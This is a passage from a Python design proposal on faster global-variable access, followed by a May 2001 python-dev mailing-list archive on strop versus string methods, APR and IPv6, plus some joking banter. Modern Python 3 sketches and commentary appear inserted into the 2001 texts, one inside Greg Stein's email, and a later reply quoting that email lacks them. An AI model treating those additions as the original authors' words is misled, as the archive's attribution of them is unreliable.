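        elif isinstance(node, (ast.Import, ast.ImportFrom)):
            for alias in node.names:
                if alias.name != "*":  # star imports can't be indexed
                    names.add(alias.asname or alias.name.split(".")[0])
        elif isinstance(node, ast.ExceptHandler) and node.name:
            names.add(node.name)
        todo.extend(ast.iter_child_nodes(node))

    # 2. Names declared `global` in any function or class body.
    for node in ast.walk(tree):
        if isinstance(node, ast.Global):
            names.update(node.names)

    # Assign indices in sorted order (an arbitrary, deterministic choice).
    return {name: index for index, name in enumerate(sorted(names))}


example = '''
import os.path
from types import StringType as ST
x = 1
def f():
    global counter
    y = 2
class K:
    z = 3
for i in range(3):
    pass
'''
print(assign_global_indices(example))
# {'K': 0, 'ST': 1, 'counter': 2, 'f': 3, 'i': 4, 'os': 5, 'x': 6}
```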

Enhancement: Optimized access to other modules' globals

    If one module imports another and binds it to a name in the
    global namespace, the compiler can detect that the particular
    global is bound to a module.  The compiler could also note access
    to any attribute of that module and emit special opcodes for
    accessing these names.

    At runtime the implementation can look up the index of the module
    attribute in the module's namespace.  In the current namespace,
    a pointer to the foreign module's dlict can be recorded along with
    the name's offset in the dlict.  This would allow names,
    e.g. types.StringType, to be used with the same efficiency as
    globals. 

Backwards compatibility

    The dlict will need to maintain metainformation about whether a
    slot is currently used or not.  It will also need to maintain a
    pointer to the builtin namespace.  When a name is not currently
    used in the global namespace, the lookup will have to fail over to
    the builtin namespace.
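    The fail-over from an unused global slot to the builtin namespace
    can be sketched in a few lines of Python 3. This is an
    illustration under stated assumptions, not the proposed C
    implementation. The class ModuleGlobals and the UNBOUND marker are
    hypothetical, and the load/store/delete names merely mirror the
    dlict methods above. A bound slot costs one list access, and only
    an unbound slot pays for a dictionary lookup in builtins.

```python
import builtins

UNBOUND = object()   # marker for a slot whose global is not currently bound


class ModuleGlobals:
    """Array-backed module namespace with fail-over to builtins (sketch)."""

    def __init__(self, names, builtin_ns):
        self.names = list(names)                 # slot index -> name
        self.slots = [UNBOUND] * len(self.names)
        self.builtins = builtin_ns               # e.g. vars(builtins)

    def store(self, index, value):
        self.slots[index] = value

    def delete(self, index):
        self.slots[index] = UNBOUND

    def load(self, index):
        value = self.slots[index]
        if value is not UNBOUND:
            return value                         # common case: one list access
        name = self.names[index]
        try:
            return self.builtins[name]           # slot unused: try builtins
        except KeyError:
            raise NameError("name %r is not defined" % name) from None


g = ModuleGlobals(["len", "x"], vars(builtins))
print(g.load(0)("abc"))      # 3: no module-level len, the builtin is used
g.store(0, lambda s: -1)     # a module-level len now shadows the builtin
print(g.load(0)("abc"))      # -1
g.delete(0)
print(g.load(0)("abc"))      # 3 again
```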

    In the reverse case, each module may need a special accessor
    function for the builtin namespace that checks to see if a global
    shadowing the builtin has been added dynamically.  This check
    would only occur if there was a dynamic change to the module's
    dlict, i.e. when a name is bound that wasn't discovered at
    compile-time. 

    These mechanisms would have little if any cost for the common case
    where a module's global namespace is not modified in strange
    ways at runtime.  They would add overhead for modules that did
    unusual things with global names, but this is an uncommon practice
    and probably one worth discouraging.

    It may be desirable to disable dynamic additions to the global
    namespace in some future version of Python.  If so, the new
    implementation could provide warnings.
    

Local Variables:
mode: indented-text
indent-tabs-mode: nil
End:


From barry@digicool.com  Thu May 24 03:46:30 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Wed, 23 May 2001 22:46:30 -0400
Subject: [Python-Dev] Python 2.1.1
References: <20010523160025.B690@xs4all.nl>
 <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>
 <20010523124114.A4747@glacier.fnational.com>
 <20010523222751.G690@xs4all.nl>
 <15116.8966.324136.897953@anthem.wooz.org>
 <20010523183949.A19251@thyrsus.com>
Message-ID: <15116.30214.900667.624573@anthem.wooz.org>

>>>>> "ESR" == Eric S Raymond <esr@thyrsus.com> writes:

    ESR> Before you could say "plot complication" I was materializing
    ESR> in the Hyraxeum -- damn near nose-to-trunk with the High
    ESR> Pachyderm himself, as it turned out, who was getting wound up
    ESR> to try out his newest human-goad on a mahout they had just
    ESR> captured from the Fortified Cities.

That big self-important elephant wasn't named Puffy the Frog by any
chance, was he?  Did he taste vaguely lemony?  If so, he's got a lot
of nerve calling himself the "High Pachyderm"!  Quite a lofty title
for one whose skin is stretched to just this side of its tensile
breaking point.

Sure, I know ol' Puffy, had a few binges with the old goat myself.
You just don't want to be near him when the stray micro-meteor happens
to pierce his dermis.  Much, MUCH messier than eight crates of cornbob
filled to the brim with radioactive gorilla poop, I can assure you!

now-where'd-i-leave-my-medication?-ly y'rs,
-Barry


From esr@thyrsus.com  Thu May 24 04:04:58 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Wed, 23 May 2001 23:04:58 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.30214.900667.624573@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 10:46:30PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org>
Message-ID: <20010523230458.A28895@thyrsus.com>

Barry A. Warsaw <barry@digicool.com>:
> That big self-important elephant wasn't named Puffy the Frog by any
> chance, was he?  Did he taste vaguely lemony?  If so, he's got a lot
> of nerve calling himself the "High Pachyderm"!  Quite a lofty title
> for one whose skin is stretched to just this side of its tensile
> breaking point.

Congratulations, Barry.  I googled for "Puffy the Frog" and found a
page that...explained...this.  It was the #1 hit.

Apparently the Universe is an even more random place than I thought. 
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

If I were to select a jack-booted group of fascists who are 
perhaps as large a danger to American society as I could pick today,
I would pick BATF [the Bureau of Alcohol, Tobacco, and Firearms].
        -- U.S. Representative John Dingell, 1980


From barry@digicool.com  Thu May 24 04:14:07 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Wed, 23 May 2001 23:14:07 -0400
Subject: [Python-Dev] Python 2.1.1
References: <20010523160025.B690@xs4all.nl>
 <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>
 <20010523124114.A4747@glacier.fnational.com>
 <20010523222751.G690@xs4all.nl>
 <15116.8966.324136.897953@anthem.wooz.org>
 <20010523183949.A19251@thyrsus.com>
 <15116.30214.900667.624573@anthem.wooz.org>
 <20010523230458.A28895@thyrsus.com>
Message-ID: <15116.31871.122265.883855@anthem.wooz.org>

>>>>> "ESR" == Eric S Raymond <esr@thyrsus.com> writes:

    ESR> Congratulations, Barry.  I googled for "Puffy the Frog" and
    ESR> found a page that...explained...this.  It was the #1 hit.

Yes!  In 1965.  My dad, Pumpi "Weasleteats" Warsaw, was a bluegrass
singer in the Atlanta-based band "The Shrinking of George".  What you
found is no doubt the lyrics to that song, which topped the pop charts
briefly in 1965 (August 1st, 1965, 11:57 - 13:01 to be exact),
displacing the Beatles' "I Wanna Hold Your Head" before being itself
displaced by the Bee Gees' "Booger Feever" [sic].  Sadly, even
Napster doesn't have the mp3's and all Dad's old records are scratched
beyond hope.

    ESR> Apparently the Universe is an even more random place than I
    ESR> thought.

here's-where-the-timbot-explains-that-it's-only-pseudo-random-ly y'rs,
-Barry


From esr@thyrsus.com  Thu May 24 04:31:42 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Wed, 23 May 2001 23:31:42 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.31871.122265.883855@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 11:14:07PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org> <20010523230458.A28895@thyrsus.com> <15116.31871.122265.883855@anthem.wooz.org>
Message-ID: <20010523233142.A29023@thyrsus.com>

Barry A. Warsaw <barry@digicool.com>:
> Yes!  In 1965.  My dad, Pumpi "Weasleteats" Warsaw, was a bluegrass
> singer in the Atlanta-based band "The Shrinking of George". 

I suppose it's not a coincidence that it's Fernando Poo day today.
Of course it's not a coincidence.  There are no coincidences anywhere.
Fnord.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Sometimes it is said that man cannot be trusted with the government
of himself.  Can he, then, be trusted with the government of others?
	-- Thomas Jefferson, in his 1801 inaugural address


From aahz@rahul.net  Thu May 24 05:59:37 2001
From: aahz@rahul.net (Aahz Maruch)
Date: Wed, 23 May 2001 21:59:37 -0700 (PDT)
Subject: [Python-Dev] Killing threads
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEBJKEAA.tim.one@home.com> from "Tim Peters" at May 23, 2001 03:45:06 PM
Message-ID: <20010524045938.5228199C83@waltz.rahul.net>

Tim Peters wrote:
> [Aahz]
>>
>> (This got brought up because I experimented with os._exit() as a
>> possible solution, but that GPFs on Win98SE.)
> 
> Please open a bug report on that, then, with a tiny test case if possible.
> This worked fine on Win98SE for me just now:

Futz.  *Now* it works.  <sigh>  Chalk it up to another unreproducible
bug caused by an unstable Win98.
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From gstein@lyra.org  Thu May 24 09:33:49 2001
From: gstein@lyra.org (Greg Stein)
Date: Thu, 24 May 2001 01:33:49 -0700
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.81,2.82
In-Reply-To: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net>; from gvanrossum@users.sourceforge.net on Mon, May 14, 2001 at 07:14:46PM -0700
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <20010524013349.Y5402@lyra.org>

On Mon, May 14, 2001 at 07:14:46PM -0700, Guido van Rossum wrote:
> Update of /cvsroot/python/python/dist/src/Modules
> In directory usw-pr-cvs1:/tmp/cvs-serv26415/Modules
> 
> Modified Files:
> 	stropmodule.c 
> Log Message:
> Add warnings to the strop module, for to those functions that really
> *are* obsolete; three variables and the maketrans() function are not
> (yet) obsolete.
> 
> Add a compensating warnings.filterwarnings() call to test_strop.py.
> 
> Add this to the NEWS.

Something that I ran into the other day...

>>> ob = some_object_implementing_the_buffer_interface
>>> string.find(ob, '.')
(fails because ob does not define the .find method)
>>> strop.find(ob, '.')
(succeeds)


The point is that strop uses the t# to get a ptr/len pair to do its work.
Thus, it can work on many things that export the buffer interface. Dropping
strop means we no longer have many of those functions. Instead, the
functionality must be copied to *every* object that implements the buffer
interface.

We can say ob.find() now, but we can't say find(ob) any longer. And saying
that all objects (which implement the buffer API) must now implement a bunch
of "standard" methods is awfully burdensome.
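A rough modern analogue of what strop's t# parsing buys: one polymorphic function that accepts anything exporting the buffer interface. strop and buffer() are gone in Python 3, so this sketch assumes memoryview as the stand-in; the name generic_find is hypothetical, not a strop or string API. Unlike strop, it copies the bytes via tobytes() for simplicity.

```python
import array


def generic_find(obj, sub, start=0):
    """Return the lowest index of `sub` in any buffer-exporting object, or -1.

    Hypothetical helper: accepts bytes, bytearray, array.array, memoryview
    slices and any other object that supports the buffer protocol.
    """
    with memoryview(obj) as view:
        # tobytes() copies the exported data in C order; a zero-copy
        # version would have to scan the view itself.
        return view.tobytes().find(sub, start)


print(generic_find(bytearray(b"a.b"), b"."))           # 1
print(generic_find(array.array("b", b"xy.z"), b"."))   # 2
print(generic_find(memoryview(b"one.two")[4:], b"t"))  # 0
```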

In my particular case, I was trying to do a find on a BufferObject referring
to a subset of another object. Blam. No good. Thankfully, when I did a
find() on a mmap object, it worked simply because mmaps happen to define a
.find method.

[ of course, the find method on an mmap was totally broken, but I checked in
  a fix for that (last week or so) ]


So... my question is: is there any way that we can retain a generic find()
(and similar functions from the string/strop module) that operates on any
type that implements the buffer API?

Maybe there is some way we can do a mixin for Python types? e.g. "this mixin
implements some standard methods for 8-bit character data (using the buffer
API), which can be mixed into new Python types" That would reduce the burden
for new types.
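The mixin idea can be sketched in Python 3, where a Python class can be mixed into a built-in type. BufferStringMixin and CharArray are hypothetical names; the mixin assumes only that the concrete class exports the buffer protocol (array.array does), and it copies the data on each call to keep the sketch short. It deliberately avoids names array.array already defines (such as count) so it doesn't silently change their meaning.

```python
import array


class BufferStringMixin:
    """Hypothetical mixin: string-style methods built only on the buffer API."""

    __slots__ = ()

    def _data(self):
        # memoryview(self) works because the concrete base class
        # (array.array below) exports the buffer protocol.
        with memoryview(self) as view:
            return view.tobytes()

    def find(self, sub, start=0):
        return self._data().find(sub, start)

    def startswith(self, prefix):
        return self._data().startswith(prefix)

    def upper(self):
        return self._data().upper()


class CharArray(BufferStringMixin, array.array):
    """An array of 8-bit chars that gains the mixin's methods for free."""


chars = CharArray("b", b"hello.world")
print(chars.find(b"."))           # 5
print(chars.startswith(b"hell"))  # True
print(chars.upper())              # b'HELLO.WORLD'
```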

Thoughts?

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From gstein@lyra.org  Thu May 24 09:52:58 2001
From: gstein@lyra.org (Greg Stein)
Date: Thu, 24 May 2001 01:52:58 -0700
Subject: [Python-Dev] IPv6
In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com>; from guido@digicool.com on Thu, May 17, 2001 at 02:18:27PM -0400
References: <200105171818.f4HIIRv12891@odiug.digicool.com>
Message-ID: <20010524015258.Z5402@lyra.org>

On Thu, May 17, 2001 at 02:18:27PM -0400, Guido van Rossum wrote:
> What's our IPv6 story?  I recall that someone once sent me patches,
> but they didn't work for me.  Is it time to try again?  In certain
> circles IPv6 support in Python would be enough to switch programming
> languages... :-)

Radical suggestion:

  Toss out a ton of the platform-specific stuff in Python and use the Apache
  Portable Runtime (APR). It has IPv6 in it, but it could also help with
  loading shared libraries, threading, mmap'd files, sockets, etc.

(it won't replace *all* of Python's platform specific stuff; I think Python
 has more coverage than APR does)

Could simplify a number of things for Python, and reduce some of the
maintenance costs...

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From thomas@xs4all.net  Thu May 24 10:01:52 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Thu, 24 May 2001 11:01:52 +0200
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <m3u22bjiz6.fsf@atrus.jesus.cam.ac.uk>; from mwh@python.net on Thu, May 24, 2001 at 08:37:17AM +0100
References: <20010523160025.B690@xs4all.nl> <m3u22bjiz6.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <20010524110152.Q676@xs4all.nl>

[ Answer CC'd to python-dev since it deserves an official answer :) ]

On Thu, May 24, 2001 at 08:37:17AM +0100, Michael Hudson wrote:
> For summarising purposes, do you have any idea when Python 2.1.1 will
> be released?

> "No" is a perfectly acceptable answer.

Then "No" it is ! Even though I have a fair bit of patches in the queue
right now, I need some more time to check out (no pun intended) the changes
since the fork, and I want to browse the bug list for possible bugs that
should be checked out and fixed for 2.1.1. Another couple of weeks at least,
before a release candidate. It also depends on Moshe; if he actually
releases 2.0.1 anytime soon, I'll hold off on 2.1.1 a bit longer.

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal@lemburg.com  Thu May 24 11:18:50 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 24 May 2001 12:18:50 +0200
Subject: [Python-Dev] strop vs. string
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org>
Message-ID: <3B0CE00A.488C8D73@lemburg.com>

Greg Stein wrote:
> 
> On Mon, May 14, 2001 at 07:14:46PM -0700, Guido van Rossum wrote:
> > Update of /cvsroot/python/python/dist/src/Modules
> > In directory usw-pr-cvs1:/tmp/cvs-serv26415/Modules
> >
> > Modified Files:
> >       stropmodule.c
> > Log Message:
> > Add warnings to the strop module, for to those functions that really
> > *are* obsolete; three variables and the maketrans() function are not
> > (yet) obsolete.
> >
> > Add a compensating warnings.filterwarnings() call to test_strop.py.
> >
> > Add this to the NEWS.
> 
> Something that I ran into the other day...
> 
> >>> ob = some_object_implementing_the_buffer_interface
> >>> string.find(ob, '.')
> (fails because ob does not define the .find method)
> >>> strop.find(ob, '.')
> (succeeds)
> 
> The point is that strop uses the t# to get a ptr/len pair to do its work.
> Thus, it can work on many things that export the buffer interface. Dropping
> strop means we no longer have many of those functions. Instead, the
> functionality must be copied to *every* object that implements the buffer
> interface.
> 
> We can say ob.find() now, but we can't say find(ob) any longer. And saying
> that all objects (which implement the buffer API) must now implement a bunch
> of "standard" methods is awfully burdensome.
> 
> In my particular case, I was trying to do a find on a BufferObject referring
> to a subset of another object. Blam. No good. Thankfully, when I did a
> find() on a mmap object, it worked simply because mmaps happen to define a
> .find method.
> 
> [ of course, the find method on an mmap was totally broken, but I checked in
>   a fix for that (last week or so) ]
> 
> So... my question is: is there any way that we can retain a generic find()
> (and similar functions from the string/strop module) that operates on any
> type that implements the buffer API?
> 
> Maybe there is some way we can do a mixin for Python types? e.g. "this mixin
> implements some standard methods for 8-bit character data (using the buffer
> API), which can be mixed into new Python types" That would reduce the burden
> for new types.

I suppose that in 2.2 we'll be able to build a class/type
hierarchy which then provides these possibilities. I haven't
followed Guido's latest checkins closely though -- could be that
types don't support multiple inheritance.

BTW, wouldn't it suffice to add these methods to buffer objects ?
Then you could write: buffer(ob).find('.').

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From barry@digicool.com  Thu May 24 12:50:34 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Thu, 24 May 2001 07:50:34 -0400
Subject: [Python-Dev] IPv6
References: <200105171818.f4HIIRv12891@odiug.digicool.com>
 <20010524015258.Z5402@lyra.org>
Message-ID: <15116.62858.720241.46017@anthem.wooz.org>

>>>>> "GS" == Greg Stein <gstein@lyra.org> writes:

    GS>   Toss out a ton of the platform-specific stuff in Python and
    GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but
    GS> it could also help with loading shared libraries, threading,
    GS> mmap'd files, sockets, etc.

I don't know squat about APR, but would it have to be either-or?  IOW,
would it be possible to wrap the APR in a module (or package) and
provide it as an importable alternative?

-Barry


From mal@lemburg.com  Thu May 24 13:22:42 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 24 May 2001 14:22:42 +0200
Subject: [Python-Dev] IPv6
References: <200105171818.f4HIIRv12891@odiug.digicool.com>
 <20010524015258.Z5402@lyra.org> <15116.62858.720241.46017@anthem.wooz.org>
Message-ID: <3B0CFD12.164271D8@lemburg.com>

"Barry A. Warsaw" wrote:
> 
> >>>>> "GS" == Greg Stein <gstein@lyra.org> writes:
> 
>     GS>   Toss out a ton of the platform-specific stuff in Python and
>     GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but
>     GS> it could also help with loading shared libraries, threading,
>     GS> mmap'd files, sockets, etc.
> 
> I don't know squat about APR, but would it have to be either-or?  IOW,
> would it be possible to wrap the APR in a module (or package) and
> provide it as an importable alternative?

Should be possible; the problem is: how do you get the APR types
to interact with the original Python ones (e.g. file types). Many
low-level Python functions require the native Python types, so
while wrapping APR as a Python module would provide an alternative, that
alternative will most probably not help much w/r to simplifying
portability issues.

FYI, here's what the APR has to offer (taken from the APRDesign
file that comes with Apache 2.0 beta):
"""
The base types in APR
file_io     File I/O, including pipes
lib         A portable library originally used in Apache.  This contains
            memory management, tables, and arrays.
locks       Mutex and reader/writer locks
misc        Any APR type which doesn't have any other place to belong
network_io  Network I/O
shmem       Shared Memory (Not currently implemented)   
signal      Asynchronous Signals
threadproc  Threads and Processes
time        Time 
"""

It currently supports: Unix (includes BeOS), Win32 and OS/2.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From gstein@lyra.org  Thu May 24 13:55:55 2001
From: gstein@lyra.org (Greg Stein)
Date: Thu, 24 May 2001 05:55:55 -0700
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <3B0CFD12.164271D8@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 02:22:42PM +0200
References: <200105171818.f4HIIRv12891@odiug.digicool.com> <20010524015258.Z5402@lyra.org> <15116.62858.720241.46017@anthem.wooz.org> <3B0CFD12.164271D8@lemburg.com>
Message-ID: <20010524055555.B5402@lyra.org>

On Thu, May 24, 2001 at 02:22:42PM +0200, M.-A. Lemburg wrote:
> "Barry A. Warsaw" wrote:
> > >>>>> "GS" == Greg Stein <gstein@lyra.org> writes:
> > 
> >     GS>   Toss out a ton of the platform-specific stuff in Python and
> >     GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but
> >     GS> it could also help with loading shared libraries, threading,
> >     GS> mmap'd files, sockets, etc.
> > 
> > I don't know squat about APR, but would it have to be either-or?  IOW,
> > would it be possible to wrap the APR in a module (or package) and
> > provide it as an importable alternative?

Sure, that is a possibility, but it doesn't save Python much in terms of
maintenance or portability. "Just another library"

Truly using it could certainly be done as a slow migration, and it is
definitely possible to only use portions, subsets, etc. Another alternative
would be to use APR as a "platform target". But that just adds yet another
platform to support rather than simplifying.

> Should be possible; the problem is: how do you get the APR types
> to interact with the original Python ones (e.g. file types). Many

The header is a total misnomer, but "apr_portable.h" provides access to an
opaque type's underlying native object (many of us aren't sure how Ryan
arrived at "portable" being the name for the least-portable aspect of the
library :-). Anyways... you can extract a file descriptor from a file or
socket or pipe. Or a thread ID from a thread object, etc.
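For comparison, the same escape hatch in Python terms: file, pipe and socket objects hand back their native descriptor through fileno(). This only illustrates the analogy and does not use or model any APR function.

```python
import os
import socket

# os.pipe() returns raw descriptors; wrapping them in file objects and
# asking fileno() gives the same native handles back.
read_fd, write_fd = os.pipe()
with os.fdopen(write_fd, "wb") as writer:
    assert writer.fileno() == write_fd
    writer.write(b"ping")
with os.fdopen(read_fd, "rb") as reader:
    assert reader.fileno() == read_fd
    data = reader.read()  # the writer is closed, so this reads up to EOF

# Sockets expose their descriptor (a SOCKET handle on Windows) the same way.
left, right = socket.socketpair()
with left, right:
    sock_fd = left.fileno()

print(data, sock_fd >= 0)  # b'ping' True
```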

> low-level Python functions require the native Python types, so
> while wrapping APR as a Python module would provide an alternative, that
> alternative will most probably not help much w/r to simplifying
> portability issues.

Right. I'd say use the APR functions unless absolute speed is required (such
as the readlines stuff). But you could also argue that the hard-core
platform specific optimizations could go into APR itself, so that Python
doesn't have to worry about them.

> FYI, here's what the APR has to offer (taken from the APRDesign
> file that comes with Apache 2.0 beta):
> """
> The base types in APR
> file_io     File I/O, including pipes
> lib         A portable library originally used in Apache.  This contains
>             memory management, tables, and arrays.
> locks       Mutex and reader/writer locks
> misc        Any APR type which doesn't have any other place to belong
> network_io  Network I/O
> shmem       Shared Memory (Not currently implemented)   
> signal      Asynchronous Signals
> threadproc  Threads and Processes
> time        Time 
> """

That doc is out of date; the list is missing: shared library handling, i18n,
mmap, user information access (e.g. getpwnam), uuid handling, getopt
replacements, cryptographic random data, and a few other bits here and
there. The shared mem actually is implemented mostly, via the libmm library.

And note that some of those topics have some nice depth. As I mentioned,
network_io supports IPv6, but also portable name lookups, sendfile(), etc.
The file_io stuff supports optimized stat() and opendir-type calls for the
platform.

> It currently supports: Unix (includes BeOS), Win32 and OS/2.

A lot more than that :-)  Pretty much all the Unix variants, including
OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. 

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From gstein@lyra.org  Thu May 24 14:00:16 2001
From: gstein@lyra.org (Greg Stein)
Date: Thu, 24 May 2001 06:00:16 -0700
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0CE00A.488C8D73@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 12:18:50PM +0200
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com>
Message-ID: <20010524060016.D5402@lyra.org>

On Thu, May 24, 2001 at 12:18:50PM +0200, M.-A. Lemburg wrote:
> Greg Stein wrote:
>...
> > So... my question is: is there any way that we can retain a generic find()
> > (and similar functions from the string/strop module) that operates on any
> > type that implements the buffer API?
> > 
> > Maybe there is some way we can do a mixin for Python types? e.g. "this mixin
> > implements some standard methods for 8-bit character data (using the buffer
> > API), which can be mixed into new Python types" That would reduce the burden
> > for new types.
> 
> I suppose that in 2.2 we'll be able to build a class/type
> hierarchy which then provides these possibilities. I haven't
> followed Guido's latest checkins closely though -- could be that
> types don't support multiple inheritance.

No idea either... that's why I asked.

> BTW, wouldn't it suffice to add these methods to buffer objects ?
> Then you could write: buffer(ob).find('.').

You're totally missing the point with that suggestion. It does *not* suffice
to add them to buffer objects. What about array objects? mmap objects?
Random Joe Object who implements the buffer interface?

All of those are out of luck.

With strop, I can pass any of those objects to strop.find(). That function
has a polymorphic argument.

In the current arrangement, every object must implement their own .find and
.upper and .whatever.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From mwh@python.net  Thu May 24 14:02:34 2001
From: mwh@python.net (Michael Hudson)
Date: Thu, 24 May 2001 14:02:34 +0100 (BST)
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <20010524055555.B5402@lyra.org>
Message-ID: <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>

I can't think of a good way of expressing this, but I don't think we
should try to make writing non cross-platform code in Python impossible.
Yes, it should be easy to write x-platform code, but if there's some very
specific platform trick I can do with, say, setsockopt, I don't want
Python to hide it from me just 'cause it doesn't work on VMS.

Maybe this isn't an issue here.

On Thu, 24 May 2001, Greg Stein wrote:
[...]
> That doc is out of date; the list is missing: shared library handling, i18n,
> mmap, user information access (e.g. getpwnam), uuid handling, getopt
> replacements, cryptographic random data, and a few other bits here and
> there. The shared mem actually is implemented mostly, via the libmm library.

How big is APR?  How stable?  (in terms of interface; I'm assuming it
doesn't crap out through bad programming or it'd be a non-starter)

> And note that some of those topics have some nice depth. As I mentioned,
> network_io supports IPv6, but also portable name lookups, sendfile(), etc.
> The file_io stuff supports optimized stat() and opendir-type calls for the
> platform.
>
> > It currently supports: Unix (includes BeOS), Win32 and OS/2.
>
> A lot more than that :-)  Pretty much all the Unix variants, including
> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs.

That's still less than Python isn't it?  RiscOS, Amiga, PalmOS, VMS,
Playstation 2(!), from looking at
http://www.python.org/download/download_other.html.

Cheers,
M.


From gstein@lyra.org  Thu May 24 14:59:21 2001
From: gstein@lyra.org (Greg Stein)
Date: Thu, 24 May 2001 06:59:21 -0700
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>; from mwh@python.net on Thu, May 24, 2001 at 02:02:34PM +0100
References: <20010524055555.B5402@lyra.org> <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>
Message-ID: <20010524065921.E5402@lyra.org>

On Thu, May 24, 2001 at 02:02:34PM +0100, Michael Hudson wrote:
> I can't think of a good way of expressing this, but I don't think we
> should try to make writing non cross-platform code in Python impossible.

I don't think this would preclude writing non cross-platform code. As I
mentioned, there isn't anything that would prevent the stuff from working
side by side.

The idea is to simplify certain aspects of Python's platform specific stuff.
For example: all those variants of dynamically loading shared modules
(Python/dynload_*.c) can be tossed along with the config magic.

> Yes, it should be easy to write x-platform code, but if there's some very
> specific platform trick I can do with, say, setsockopt, I don't want
> Python to hide it from me just 'cause it doesn't work on VMS.

APR isn't a least common denominator approach.

>...
> > That doc is out of date; the list is missing: shared library handling, i18n,
> > mmap, user information access (e.g. getpwnam), uuid handling, getopt
> > replacements, cryptographic random data, and a few other bits here and
> > there. The shared mem actually is implemented mostly, via the libmm library.
> 
> How big is APR?

That's relative :-)  On my Linux box, a stripped library is 85k.

It is also (theoretically) possible to skip building portions of APR. The
APIs and symbols are set up for that, but the autoconf setup isn't yet. If
you're embedding a private APR build, then you can fine tune what is needed.
However, if you're building a public/shared one, then you wouldn't really
want to trim it back like that.

> How stable?

The existing functionality is quite stable. We just keep adding more, though
:-)

> (in terms of interface; I'm assuming it
> doesn't crap out through bad programming or it'd be a non-starter)

hehe... you can call it a non-starter, then. APR assumes you pass it valid
pointers and objects. For example, if you call apr_file_read(NULL, NULL,
100), then you'll get a segfault rather than EINVAL. Personally, I find that
behavior quite fine (EINVAL will invariably get ignored; a segfault doesn't;
and this is a programmer error that needs to be attended to -- throw it in
his face)

Whether others think that is a non-starter... hard to know :-)

[ actually, one of the hardest things to integrate would be APR's memory
  management approach with Python's ]

> > And note that some of those topics have some nice depth. As I mentioned,
> > network_io supports IPv6, but also portable name lookups, sendfile(), etc.
> > The file_io stuff supports optimized stat() and opendir-type calls for the
> > platform.
> >
> > > It currently supports: Unix (includes BeOS), Win32 and OS/2.
> >
> > A lot more than that :-)  Pretty much all the Unix variants, including
> > OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs.
> 
> That's still less than Python isn't it?  RiscOS, Amiga, PalmOS, VMS,
> Playstation 2(!), from looking at
> http://www.python.org/download/download_other.html.

Sure it's smaller.

It's a blue sky radical suggestion. No more, no less. :-) I mentioned it
because the IPv6 stuff came up. I already know a codebase that has handled
all the portability issues. That is a bonus :-)

However, for the platforms that APR *does* handle today, that would still be
a big code reduction for Python. And in the future? Why not extend APR to
